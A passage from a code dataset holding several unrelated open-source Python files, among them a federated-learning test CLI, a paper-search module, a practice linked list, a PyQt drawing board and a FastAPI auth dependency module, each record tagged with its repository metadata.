Intersection, Reader,\n)\nfrom pipeline.interface import Data\n\n\n@click.group(short_help=\"FATE Flow Test Operations\")\n@click.pass_context\ndef test(ctx):\n \"\"\"\n \\b\n Provides numbers of component operational commands, including metrics, parameters and etc.\n For more details, please check out the help text.\n \"\"\"\n pass\n\n\n@test.command(\"toy\", short_help=\"Toy Test Command\")\n@cli_args.GUEST_PARTYID_REQUIRED\n@cli_args.HOST_PARTYID_REQUIRED\n@cli_args.TIMEOUT\n@cli_args.TASK_CORES\n@click.pass_context\ndef toy(ctx, **kwargs):\n flow_sdk = FlowClient(ip=ctx.obj[\"ip\"], port=ctx.obj[\"http_port\"], version=ctx.obj[\"api_version\"],\n app_key=ctx.obj.get(\"app_key\"), secret_key=ctx.obj.get(\"secret_key\"))\n submit_result = flow_sdk.test.toy(**kwargs)\n if submit_result[\"retcode\"] == 0:\n for t in range(kwargs[\"timeout\"]):\n job_id = submit_result[\"jobId\"]\n r = flow_sdk.job.query(job_id=job_id, role=\"guest\", party_id=kwargs[\"guest_party_id\"])\n if r[\"retcode\"] == 0 and len(r[\"data\"]):\n job_status = r[\"data\"][0][\"f_status\"]\n print(f\"toy test job {job_id} is {job_status}\")\n if job_status in {\"success\", \"failed\", \"canceled\"}:\n check_log(flow_sdk, kwargs[\"guest_party_id\"], job_id, job_status)\n break\n time.sleep(1)\n else:\n print(f\"check job status timeout\")\n check_log(flow_sdk, kwargs[\"guest_party_id\"], job_id, job_status)\n else:\n prettify(submit_result)\n\n\ndef check_log(flow_sdk, party_id, job_id, job_status):\n r = flow_sdk.job.log(job_id=job_id, output_path=\"./logs/toy\")\n if r[\"retcode\"] == 0:\n log_msg = flow_sdk.test.check_toy(party_id, job_status, r[\"directory\"])\n try:\n for msg in log_msg:\n print(msg)\n except BaseException:\n print(f\"auto check log failed, please check {r['directory']}\")\n else:\n print(f\"get log failed, please check PROJECT_BASE/logs/{job_id} on the fateflow server machine\")\n\n\n@test.command(\"min\", short_help=\"Min Test Command\")\n@click.option(\"-t\", \"--data-type\", type=click.Choice([\"fast\", \"normal\"]), default=\"fast\", show_default=True,\n help=\"fast for breast data, normal for default credit data\")\n@click.option(\"--sbt/--no-sbt\", is_flag=True, default=True, show_default=True, help=\"run sbt test or not\")\n@cli_args.GUEST_PARTYID_REQUIRED\n@cli_args.HOST_PARTYID_REQUIRED\n@cli_args.ARBITER_PARTYID_REQUIRED\n@click.pass_context\ndef run_min_test(ctx, data_type, sbt, guest_party_id, host_party_id, arbiter_party_id, **kwargs):\n guest_party_id = int(guest_party_id)\n host_party_id = int(host_party_id)\n arbiter_party_id = int(arbiter_party_id)\n\n if data_type == \"fast\":\n guest_train_data = {\"name\": \"breast_hetero_guest\", \"namespace\": \"experiment\"}\n host_train_data = {\"name\": \"breast_hetero_host\", \"namespace\": \"experiment\"}\n auc_base = 0.98\n elif data_type == \"normal\":\n guest_train_data = {\"name\": \"default_credit_hetero_guest\", \"namespace\": \"experiment\"}\n host_train_data = {\"name\": \"default_credit_hetero_host\", \"namespace\": \"experiment\"}\n auc_base = 0.69\n else:\n click.echo(f\"data type {data_type} not supported\", err=True)\n raise click.Abort()\n\n lr_pipeline = lr_train_pipeline(guest_party_id, host_party_id, arbiter_party_id, guest_train_data, host_train_data)\n lr_auc = get_auc(lr_pipeline, \"hetero_lr_0\")\n\n if lr_auc < auc_base:\n click.echo(f\"Warning: The LR auc {lr_auc} is lower than expect value {auc_base}\")\n\n predict_pipeline(lr_pipeline, guest_party_id, host_party_id, guest_train_data, host_train_data)\n\n if sbt:\n sbt_pipeline = sbt_train_pipeline(guest_party_id, host_party_id, guest_train_data, host_train_data)\n sbt_auc = get_auc(sbt_pipeline, \"hetero_secureboost_0\")\n\n if sbt_auc < auc_base:\n click.echo(f\"Warning: The SBT auc {sbt_auc} is lower than expect value {auc_base}\")\n\n predict_pipeline(sbt_pipeline, guest_party_id, host_party_id, guest_train_data, host_train_data)\n\n\ndef lr_train_pipeline(guest, host, arbiter, guest_train_data, host_train_data):\n pipeline = PipeLine().set_initiator(role=\"guest\", party_id=guest).set_roles(guest=guest, host=host, arbiter=arbiter)\n\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n\n data_transform_0 = DataTransform(name=\"data_transform_0\")\n data_transform_0.get_party_instance(role=\"guest\", party_id=guest).component_param(\n with_label=True, output_format=\"dense\")\n data_transform_0.get_party_instance(role=\"host\", party_id=host).component_param(with_label=False)\n\n intersection_0 = Intersection(name=\"intersection_0\")\n\n lr_param = {\n \"penalty\": \"L2\",\n \"tol\": 0.0001,\n \"alpha\": 0.01,\n \"optimizer\": \"rmsprop\",\n \"batch_size\": -1,\n \"learning_rate\": 0.15,\n \"init_param\": {\n \"init_method\": \"zeros\",\n \"fit_intercept\": True,\n },\n \"max_iter\": 30,\n \"early_stop\": \"diff\",\n \"encrypt_param\": {\n \"key_length\": 1024,\n },\n \"cv_param\": {\n \"n_splits\": 5,\n \"shuffle\": False,\n \"random_seed\": 103,\n \"need_cv\": False,\n },\n \"validation_freqs\": 3,\n }\n hetero_lr_0 = HeteroLR(name=\"hetero_lr_0\", **lr_param)\n\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=\"binary\")\n\n pipeline.add_component(reader_0)\n pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))\n pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))\n pipeline.add_component(hetero_lr_0, data=Data(train_data=intersection_0.output.data))\n pipeline.add_component(evaluation_0, data=Data(data=hetero_lr_0.output.data))\n\n pipeline.compile()\n pipeline.fit()\n\n return pipeline\n\n\ndef sbt_train_pipeline(guest, host, guest_train_data, host_train_data):\n pipeline = PipeLine().set_initiator(role=\"guest\", party_id=guest).set_roles(guest=guest, host=host)\n\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n\n data_transform_0 = DataTransform(name=\"data_transform_0\")\n data_transform_0.get_party_instance(role=\"guest\", party_id=guest).component_param(\n with_label=True, output_format=\"dense\")\n data_transform_0.get_party_instance(role=\"host\", party_id=host).component_param(with_label=False)\n\n intersection_0 = Intersection(name=\"intersection_0\")\n\n sbt_param = {\n \"task_type\": \"classification\",\n \"objective_param\": {\n \"objective\": \"cross_entropy\",\n },\n \"num_trees\": 3,\n \"validation_freqs\": 1,\n \"encrypt_param\": {\n \"method\": \"paillier\",\n \"key_length\": 1024\n },\n \"tree_param\": {\n \"max_depth\": 3,\n }\n }\n hetero_secure_boost_0 = HeteroSecureBoost(name=\"hetero_secureboost_0\", **sbt_param)\n\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=\"binary\")\n\n pipeline.add_component(reader_0)\n pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))\n pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))\n pipeline.add_component(hetero_secure_boost_0, data=Data(train_data=intersection_0.output.data))\n pipeline.add_component(evaluation_0, data=Data(data=hetero_secure_boost_0.output.data))\n\n pipeline.compile()\n pipeline.fit()\n\n return pipeline\n\n\ndef get_auc(pipeline, component_name):\n cpn_summary = pipeline.get_component(component_name).get_summary()\n auc = cpn_summary.get(\"validation_metrics\").get(\"train\").get(\"auc\")[-1]\n return auc\n\n\ndef predict_pipeline(train_pipeline, guest, host, guest_train_data, host_train_data):\n cpn_list = train_pipeline.get_component_list()[1:]\n train_pipeline.deploy_component(cpn_list)\n\n pipeline = PipeLine()\n reader_0 = Reader(name=\"reader_0\")\n reader_0.get_party_instance(role=\"guest\", party_id=guest).component_param(table=guest_train_data)\n reader_0.get_party_instance(role=\"host\", party_id=host).component_param(table=host_train_data)\n pipeline.add_component(reader_0)\n pipeline.add_component(train_pipeline, data=Data(predict_input={\n train_pipeline.data_transform_0.input.data: reader_0.output.data}))\n pipeline.predict()\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_client/flow_client/flow_cli/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9076,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"41988297359","text":"from sqlalchemy import sql\n\nfrom app import db\nfrom pub import Pub\n\n\ndef fulltext_search_title(query, is_oa=None, page=1):\n if query:\n query = query.replace('\\0', '')\n\n oa_clause = 'true' if is_oa is None else 'response_is_oa' if is_oa else 'not response_is_oa'\n\n query_statement = sql.text('''\n with matches as materialized (\n select id, title, query, response_is_oa\n from pub, websearch_to_tsquery('english', :search_str) query\n where to_tsvector('english', title) @@ query\n limit 1000\n )\n select\n id,\n ts_headline('english', title, query),\n ts_rank_cd(to_tsvector('english', title), query, 1) as rank\n from matches\n where {oa_clause}\n order by rank desc limit 50 offset {offset}\n ;'''.format(oa_clause=oa_clause, offset=int(page-1)*50))\n\n rows = db.engine.execute(query_statement.bindparams(search_str=query)).fetchall()\n search_results = {row[0]: {'snippet': row[1], 'score': row[2]} for row in rows}\n\n cached_responses = [p[0] for p in db.session.query(Pub.response_jsonb).filter(Pub.id.in_(list(search_results.keys()))).all()]\n\n if is_oa:\n oa_filter = lambda r: r['is_oa']\n elif is_oa is None:\n oa_filter = lambda r: True\n else:\n oa_filter = lambda r: not r['is_oa']\n\n filtered_responses = [\n {\n 'response': response,\n 'snippet': search_results[response['doi']]['snippet'],\n 'score': search_results[response['doi']]['score'],\n }\n for response in cached_responses if oa_filter(response)\n ][0:50]\n\n return sorted(filtered_responses, key=lambda r: r['score'], reverse=True)\n\ndef autocomplete_phrases(query):\n query_statement = sql.text(r\"\"\"\n with s as (SELECT id, lower(title) as lower_title FROM pub_2018 WHERE title iLIKE :p0)\n select match, count(*) as score from (\n SELECT regexp_matches(lower_title, :p1, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p2, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p3, 'g') as match FROM s\n union all\n SELECT regexp_matches(lower_title, :p4, 'g') as match FROM s\n ) s_all\n group by match\n order by score desc, length(match::text) asc\n LIMIT 50;\"\"\").bindparams(\n p0='%{}%'.format(query),\n p1=r'({}\\w*?\\M)'.format(query),\n p2=r'({}\\w*?(?:\\s+\\w+){{1}})\\M'.format(query),\n p3=r'({}\\w*?(?:\\s+\\w+){{2}})\\M'.format(query),\n p4=r'({}\\w*?(?:\\s+\\w+){{3}}|)\\M'.format(query)\n )\n\n rows = db.engine.execute(query_statement).fetchall()\n phrases = [{\"phrase\":row[0][0], \"score\":row[1]} for row in rows if row[0][0]]\n return phrases","repo_name":"ourresearch/oadoi","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"53"} +{"seq_id":"33447391377","text":"#!/usr/bin/env python3\nfrom typing import Optional, Union\n\n\nclass SLLNode():\n \"\"\"A node of a singly-linked list.\"\"\"\n\n def __init__(self, node_data, next_node=None):\n self.data = node_data\n self.next = next_node\n\n\nclass SinglyLinkedList():\n \"\"\"A data structure where parent elements hold a reference to a child.\n\n The child elements do not hold references to the parent, so this structure\n can only be iterated through forwards.\n \"\"\"\n head, tail = None\n def __init__(self, head=None):\n if isinstance(head, SLLNode):\n self.head = head\n else:\n self.head = SLLNode(head)\n\n def __len__(self) -> int:\n \"\"\"Determine how long the list is.\"\"\"\n length = 0\n if self.head:\n length, element = 1, self.head\n while element.next is not None:\n length += 1\n element = element.next\n return length\n\n def __bool__(self):\n \"\"\"Return true if the list is not empty.\"\"\"\n return self.head is not None\n\n @property\n def tail(self):\n \"\"\"The last node in the list\"\"\"\n return get_tail_of(self.head)\n\n def list_elements(\n self,\n list_or_node: Optional[Union[SinglyLinkedList, SLLNode]] = None\n ):\n \"\"\"Print all elements of this or a specified list to stdout\"\"\"\n if list_or_node is None:\n if self.head:\n self.list_elements_of(self.head)\n else:\n print(\"Empty list.\")\n else:\n self.list_elements_of(list_or_node)\n\n @staticmethod\n def list_elements_of(\n list_or_node: Optional[Union[SinglyLinkedList, SLLNode]] = None\n ):\n \"\"\"Print all elements of the specified list to stdout.\"\"\"\n if list_or_node is None:\n print(\"Empty list.\")\n if isinstance(list_or_node, SinglyLinkedList):\n SinglyLinkedList.list_elements_of(list_or_node.head)\n return\n if isinstance(list_or_node, SLLNode):\n print(list_or_node.data)\n element = list_or_node\n while element.next:\n element = element.next\n print(element.data)\n\n @staticmethod\n def prepend_to(original_list, list_or_data=None):\n \"\"\"Prepend a node or data to the given list.\n\n list_or_data can be anything. If it's a SinglyLinkedList or SLLNode,\n the original_list gets attached to its tail and it's returned.\n Otherwise, a new node is created and the original list is appended to\n it.\n\n original_list must be a SinglyLinkedList or SLLNode. A TypeError will\n be raised on any other input.\n list_or_data This can be a SinglyLinkedList, a SLLNode, or raw data\n to be put in an SLLNode.\n\n Returns a SinglyLinkedList.\n May raise a TypeError.\n \"\"\"\n if isinstance(original_list, SinglyLinkedList):\n return SinglyLinkedList.prepend_to(\n original_list.head, list_or_data\n )\n elif isinstance(original_list, SLLNode):\n # do actual stuff\n if isinstance(list_or_data, SLLNode):\n newList = SinglyLinkedList(list_or_data)\n # both values are SLLNodes representing their respective heads\n newList.tail.next = original_list\n return newList\n elif isinstance(list_or_data, SinglyLinkedList):\n return SinglyLinkedList.prepend_to(\n original_list, list_or_data.head\n )\n else:\n return SinglyLinkedList.prepend_to(\n original_list, SLLNode(list_or_data)\n )\n else:\n raise TypeError(\n \"The original list should be a SinglyLinkedList or SLLNode, \"\n f\"got {original_list} of type {type(original_list)}\")\n\n def prepend(self, data):\n \"\"\"Add a new element at the beginning of the list.\"\"\"\n if isinstance(data, SLLNode):\n get_tail_of(data).next = self.head\n self.head = data\n else:\n self.prepend(SLLNode(data))\n\n def append(self, data):\n \"\"\"Add a new element to the end of the list.\"\"\"\n if isinstance(data, SLLNode):\n # the received data is actually a node.\n if self.head:\n self.tail.next = data\n else:\n self.head = data\n else:\n self.append(SLLNode(data))\n\n @staticmethod\n def append_to(original_list, list_or_data):\n \"\"\"Static version of append() which returns the modified list.\"\"\"\n if isinstance(original_list, SinglyLinkedList):\n return SinglyLinkedList.append_to(\n original_list.head, list_or_data)\n elif isinstance(original_list, SLLNode):\n if isinstance(list_or_data, SinglyLinkedList):\n return SinglyLinkedList.append_to(\n original_list.head, list_or_data)\n elif isinstance(list_or_data, SLLNode):\n new_list = SinglyLinkedList(list_or_data)\n new_list.tail.next = original_list\n return new_list\n else:\n return SinglyLinkedList.append_to(\n original_list, SLLNode(list_or_data)\n )\n else:\n raise TypeError(\n \"original_list must be a SinglyLinkedList or SLLNode. \"\n f\"Received {original_list} of type {type(original_list)}\")\n\n def insert(self, data, position: int):\n \"\"\"Insert the given data at the given index of this list.\"\"\"\n if isinstance(data, SLLNode):\n index: int = 0\n old_list: SinglyLinkedList = SinglyLinkedList(self.head)\n working_node: SLLNode = old_list.head\n self.head = None\n while index < position:\n if not working_node.next:\n raise ValueError(\n f\"The requested position ({position}) is longer than\"\n f\" the total length of the list ({index}).\"\n )\n index += 1\n self.append(working_node.data)\n working_node = working_node.next\n self.append(data)\n self.append(working_node)\n if isinstance(data, SinglyLinkedList):\n self.insert(data.head)\n else:\n self.insert(SLLNode(data))\n\n @staticmethod\n def insert_into(old_list, data, position: int):\n \"\"\"Get a new list with the given data inserted into the given list.\"\"\"\n assert isinstance(old_list, SinglyLinkedList)\n if isinstance(data, SLLNode):\n index, new_list = 0, SinglyLinkedList()\n working_node = old_list.head\n while index < position:\n if not working_node.next:\n raise ValueError(\n f\"The requested position ({position}) is longer than\"\n f\" the total length of the list ({index}).\"\n )\n index += 1\n new_list.append(working_node.data)\n working_node = working_node.next\n new_list.append(data)\n new_list.append(working_node)\n return new_list\n if isinstance(data, SinglyLinkedList):\n return SinglyLinkedList.insert_into(old_list, data.head, position)\n else:\n return SinglyLinkedList.insert_into(\n old_list, SLLNode(data), position)\n\n def delete_by_index(self, index):\n \"\"\"Delete an element by its position in the list.\"\"\"\n self.head = delete_from_list_by_index(self.head, index).head\n\n def delete_by_value(self, value):\n \"\"\"Delete all of the elements that match the value specified.\"\"\"\n self.head = delete_from_head_by_value(self.head, value).head\n\n\ndef delete_from_list_by_index(linked_list, index):\n \"\"\"Delete the element at the given position from the given list.\"\"\"\n delete_from_head_by_index(linked_list.head, index)\n\n\ndef delete_from_head_by_index(head, index):\n assert isinstance(index, int)\n assert index >= 0\n out = SinglyLinkedList()\n working_node = head\n working_index = 0\n while working_node is not None:\n if working_index != index:\n out.append(working_node)\n index += 1\n working_node = working_node.next\n return out\n\n\ndef delete_from_list_by_value(linked_list, value):\n \"\"\"Delete all the values from the list that match the value.\"\"\"\n return delete_from_head_by_value(linked_list.head, value)\n\n\ndef delete_from_head_by_value(head, value):\n \"\"\"Delete all the instances of the value in the list at head.\"\"\"\n assert isinstance(value, int)\n out = SinglyLinkedList()\n working_node = head\n while working_node is not None:\n if working_node.data != value:\n out.append(working_node)\n working_node = working_node.next\n return out\n\n\ndef get_tail_of(head: Optional[SLLNode]) -> Optional[SLLNode]:\n \"\"\"Return the last element of a linked list given the first.\"\"\"\n if head:\n element = head\n while element.next:\n element = element.next\n return element\n return None # received head was none.\n","repo_name":"dscottboggs/practice","sub_path":"HackerRank/LinkedLists/src/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23322777515","text":"import joblib\nfrom mdclogpy import Logger\nimport tensorflow as tf\n\nlogger = Logger(name=__name__)\n\n\nclass ModelLoad(object):\n \"\"\"Load the model if exist in ./src file directory\n \n Args:\n tfLite (bool): A choose of load data depends on what the model saved in the .tf or .tflite. True if save in .tflite and otherwise.\n \"\"\"\n\n def __init__(self, tfLite = True):\n \"\"\"Initialize the Cleansing instance.\n \n Args:\n tfLite (bool): A choose of load data depends on what the model saved in the .tf or .tflite. True if save in .tflite and otherwise.\n \"\"\"\n self.tfLite = tfLite\n self.load_model()\n self.load_scale()\n \n def load_model(self):\n \"\"\"Load the model either tfLite or tf depend on what model saved in ./src file directory\"\"\"\n \n try:\n if self.tfLite:\n self.tfLite = True\n self.model = tf.lite.Interpreter(model_path='./src/model.tflite')\n self.model.allocate_tensors()\n else:\n self.tfLite = False\n self.model = tf.keras.models.load_model('./src/model.h5')\n except FileNotFoundError:\n logger.error(\"Model Does not exsist\")\n\n def load_scale(self):\n \"\"\"Load the scale that has been store by normalized function\"\"\"\n \n try:\n with open('./src/scale', 'rb') as f:\n self.scale = joblib.load(f)\n except FileNotFoundError:\n logger.error(\"Scale file does not exsist\")\n\n def predict(self, inputs):\n \"\"\"Prediction function from dataframe arguments.\n\n Args:\n inputs (DataFrame): A data represent to predict in DataFrame from Pandas Python Library.\n \"\"\"\n \n pred = None\n if self.tfLite:\n input_details = self.model.get_input_details()\n output_details = self.model.get_output_details()\n self.model.set_tensor(input_details[0]['index'], inputs)\n self.model.invoke()\n pred = self.model.get_tensor(output_details[0]['index'])\n else:\n pred = self.model.predict(inputs)\n pred = self.scale.inverse_transform(pred)\n return pred\n","repo_name":"NTUST-BMW-Lab/traffic-steering-xApp","sub_path":"src/model_load.py","file_name":"model_load.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23526343198","text":"import sys\n\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\nfrom PyQt5.QtCore import QSize, Qt, QPoint\nfrom PyQt5.QtGui import QPixmap, QColor, QPainter, QPen\n\n\nclass PaintBoard(QWidget):\n def __init__(self, Parent = None, size = QSize(320, 240), fill_bg_color = QColor(255, 255, 255, 255)):\n super().__init__(Parent)\n self.__size = size\n self.__fill = fill_bg_color\n\n # 新建画布\n self.__board = QPixmap(self.__size)\n self.__board.fill(self.__fill)\n\n # 新建绘图工具\n self.__painter = QPainter()\n # 设置画笔起始点\n self.__begin_point = QPoint()\n self.__end_point = QPoint()\n\n #其他一些绘图相关的设置\n self.__thickness = 18 # 默认画笔粗细\n self.__penColor = QColor(0, 0, 0, 255) # 默认画笔颜色\n\n # 设置QWidget参数\n self.setFixedSize(self.__size)\n\n def getContentAsQImage(self):\n image = self.__board.toImage()\n return image\n\n def setBoardFill(self, fill):\n self.__fill = fill\n self.__board.fill(fill)\n self.update()\n\n # 设置画笔颜色\n def setPenColor(self, color):\n self.__penColor = color\n\n # 设置画笔粗细\n def setPenThickness(self, thickness=10):\n self.__thickness = thickness\n\n # 下面这些方法都是overwrite\n\n # 如果没有它的话,所有画的内容都是自动连在一起的,也就是说start point永远都是上一次画的结束位置,而不是自动感知到目前press的位置\n def mousePressEvent(self,event):\n if event.button() == Qt.LeftButton:\n self.__begin_point = event.pos()\n self.__end_point = event.pos()\n\n def paintEvent(self, e):\n # QPainter的begin方法使得绘画开始,它的参数表示painting在那里进行,这里的话就是在目前这个QWidget上进行\n # 一旦 .begin(),所有跟QPainter有关的设置都会重置\n self.__painter.begin(self)\n # 重载函数.drawPixmap(x, y, pm),把pm画在(x,y)位置\n self.__painter.drawPixmap(0, 0, self.__board)\n self.__painter.end()\n\n def mouseMoveEvent(self, e):\n if e.buttons() == Qt.LeftButton:\n self.__end_point = e.pos()\n\n self.__painter.begin(self.__board)\n self.__painter.setPen(QPen(self.__penColor, self.__thickness))\n self.__painter.drawLine(self.__begin_point, self.__end_point)\n self.__painter.end()\n\n self.__begin_point = self.__end_point\n self.update()\n\n\n def Clear(self):\n self.__board.fill(self.__fill)\n self.update()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = PaintBoard()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"momo4826/digit_recognizer_with_gui","sub_path":"gui/paintboard.py","file_name":"paintboard.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21824980028","text":"\n\nclass ScriptInterpreter():\n def __init__(self):\n self._lines = []\n self._scenelist = []\n self._currentactor = []\n self._castlist = {}\n\n def set_script(self, script):\n \"\"\"Takes a filename, formatted to the linenotes3js specifications, and creates a list containing every line in the file\"\"\"\n with open(script, \"r\") as newfile:\n self._lines = newfile.readlines()\n self._scenelist = [i for i in self._lines if i[0] == \"$\"]\n\n def set_cast_list(self, castlist, reset=False):\n \"\"\"Takes a filename with lines formatted as \"ACTOR:ROLE\" and writes the contents into a dictionary\"\"\"\n if reset: \n self._castlist = {}\n with open(castlist, \"r\") as castfile:\n for line in castfile.readlines():\n splitline = line.split(\":\")\n self._castlist[splitline[1]] = splitline[0]\n \n\n \n\n \n\n \n \n\n\n ","repo_name":"yodasodabob/LineNotes","sub_path":"lineNotes3.py","file_name":"lineNotes3.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39752762137","text":"\r\nimport time\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nfrom locals import *\r\nfrom graphics import *\r\nfrom deskobject import DeskObject\r\nfrom igoto import IGoto\r\n\r\nclass Message(IGoto):\r\n def __init__(self, msg, group, pool):\r\n IGoto.__init__(self)\r\n self.group = group\r\n self.pool = pool\r\n \r\n # set image\r\n self.image = pygame.Surface((200,MESSAGE_HEIGHT))\r\n self.image.fill((0,0,0))\r\n draw_text(self.image, msg, (5,3), fg=(255,255,0), bg=None)\r\n \r\n # set rect\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = pos_message\r\n self.old_rect = pygame.Rect(self.rect)\r\n \r\n self.birth = time.time()\r\n self.life = MESSAGE_LIFE\r\n self.zindex = MESSAGE_ZINDEX\r\n \r\n def update(self):\r\n if time.time() - self.birth > self.life:\r\n self.remove_dirty = True\r\n else:\r\n IGoto.update(self)\r\n \r\n def removecallback(self):\r\n self.pool.remove(self)\r\n self.group.remove(self)\r\n \r\n def sendmsg(self, msg, game):\r\n pass","repo_name":"xebecnan/our-gathering","sub_path":"src/client/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13711816393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 3 00:19:41 2019\n\n@author: john\n\"\"\"\n# read in input\nwith open('input.txt') as f:\n infile = f.readlines()\n\n# make it intotwo nice, easy lists of steps \nwire1 = infile[0].split(',')\nwire2 = infile[1].split(',')\n\ndef intersect_finder(wire1, wire2):\n # set up coordinate lists\n coords_w1 = []\n coords_w2 = []\n\n # set up starting points\n x1 = 0\n y1 = 0\n x2 = 0\n y2 = 0\n\n # loop through wire, adding the new coordinates to the lisy\n for d in wire1:\n w = d[0] # the direction to go\n n = int(d[1:]) # the number of steps\n for i in range(n):\n if w == 'R':\n x1 += 1\n coords_w1.append([x1,y1])\n elif w == 'L':\n x1 -= 1\n coords_w1.append([x1,y1])\n elif w == 'U':\n y1 += 1\n coords_w1.append([x1,y1])\n elif w == 'D':\n y1 -= 1\n coords_w1.append([x1,y1])\n\n # same for wire 2\n for d in wire2:\n w = d[0]\n n = int(d[1:])\n for i in range(n):\n if w == 'R':\n x2 += 1\n coords_w2.append([x2,y2])\n elif w == 'L':\n x2 -= 1\n coords_w2.append([x2,y2])\n elif w == 'U':\n y2 += 1\n coords_w2.append([x2,y2])\n elif w == 'D':\n y2 -= 1\n coords_w2.append([x2,y2])\n\n # intersecting pts are the coords that\n # are in both lists\n intersections = [i for i in coords_w1 if i in coords_w2]\n \n # Manhattan distances of intersects\n distances = [abs(c[0])+abs(c[1]) for c in intersections]\n p1 = min(distances)\n\n # use index to find n(steps) to get to point\n steps = [coords_w1.index(i) + coords_w2.index(i) + 2 for i in intersections]\n p2 = min(steps)\n return p1, p2\n\npart1, part2 = intersect_finder(wire1,wire2)\nprint(\"Part 1 answer: \" + str(part1))\nprint(\"Part 2 answer: \" + str(part2))\n","repo_name":"johnchoiniere/advent_of_code_2019","sub_path":"day_3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22840479237","text":"# -*- coding: utf-8 -*-\nfrom tortoise import fields\nfrom tortoise.models import Model\n\n\nclass User(Model):\n id = fields.BigIntField(pk=True)\n username = fields.CharField(max_length=100, unique=True)\n is_active = fields.BooleanField(default=True)\n token = fields.UUIDField()\n token_expiry = fields.DatetimeField(null=True)\n created_at = fields.DatetimeField(auto_now_add=True)\n updated_at = fields.DatetimeField(auto_now=True)\n\n def __str__(self):\n return f\"{self.username}\"\n","repo_name":"prefeitura-rio/chatbot-webhooks","sub_path":"chatbot_webhooks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18534717331","text":"# utilities to help construction of complexes\n\nfrom topologylayer.functional.persistence import SimplicialComplex\nfrom itertools import combinations\nimport numpy as np\n\n\ndef unique_simplices(faces, dim):\n \"\"\"\n obtain unique simplices up to dimension dim from faces\n \"\"\"\n simplices = [[] for k in range(dim+1)]\n # loop over faces\n for face in faces:\n # loop over dimension\n for k in range(dim+1):\n # loop over simplices\n for s in combinations(face, k+1):\n simplices[k].append(np.sort(list(s)))\n\n s = SimplicialComplex()\n # loop over dimension\n for k in range(dim+1):\n kcells = np.unique(simplices[k], axis=0)\n for cell in kcells:\n s.append(cell)\n\n return s\n\n\ndef clique_complex(n, d):\n \"\"\"\n Create d-skeleton of clique complex on n vertices\n \"\"\"\n s = SimplicialComplex()\n # loop over dimension\n for k in range(d+1):\n # loop over combinations\n for cell in combinations(range(n), k+1):\n s.append(list(cell))\n return s\n","repo_name":"bruel-gabrielsson/TopologyLayer","sub_path":"topologylayer/util/construction.py","file_name":"construction.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"53"} +{"seq_id":"18561536694","text":"\"\"\"\nDependencies for the endpoints.\n\nThe goal is to create all dependencies using a Config class\nso that the app can be configured differently for testing and production.\n\"\"\"\nfrom typing import Optional\n\nimport rootski.services.database.dynamo.models as dynamo_models\nfrom fastapi import Depends, HTTPException, Request, Security\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom loguru import logger\nfrom rootski.config.config import ANON_USER\nfrom rootski.schemas import Services\nfrom rootski.services.database.dynamo.actions.user import UserNotFoundError, get_user, register_user\nfrom rootski.services.database.dynamo.db_service import DBService as DynamoDBService\nfrom rootski.services.database.dynamo.models2schemas.user import dynamo_to_pydantic__user\n\nfrom rootski import schemas\n\n################################\n# --- FastAPI Dependencies --- #\n################################\n\n\nasync def filter_valid_token(\n request: Request, credentials: HTTPAuthorizationCredentials = Security(HTTPBearer(auto_error=False))\n) -> Optional[str]:\n \"\"\"Return the token if it is valid, otherwise return None. None is taken to be the anon user.\"\"\"\n if credentials:\n token: str = credentials.credentials\n app_services: Services = request.app.state.services\n if not app_services.auth.token_is_valid(token):\n logger.error(f'Got malformed token \"{str(token)}\".')\n raise HTTPException(status_code=401, detail=\"Authorization token is invalid. See logs for details.\")\n return token\n return None\n\n\nasync def get_authorized_user_email_or_anon(request: Request, token: str = Depends(filter_valid_token)) -> str:\n \"\"\"\n :raises AuthServiceError: if the token is not 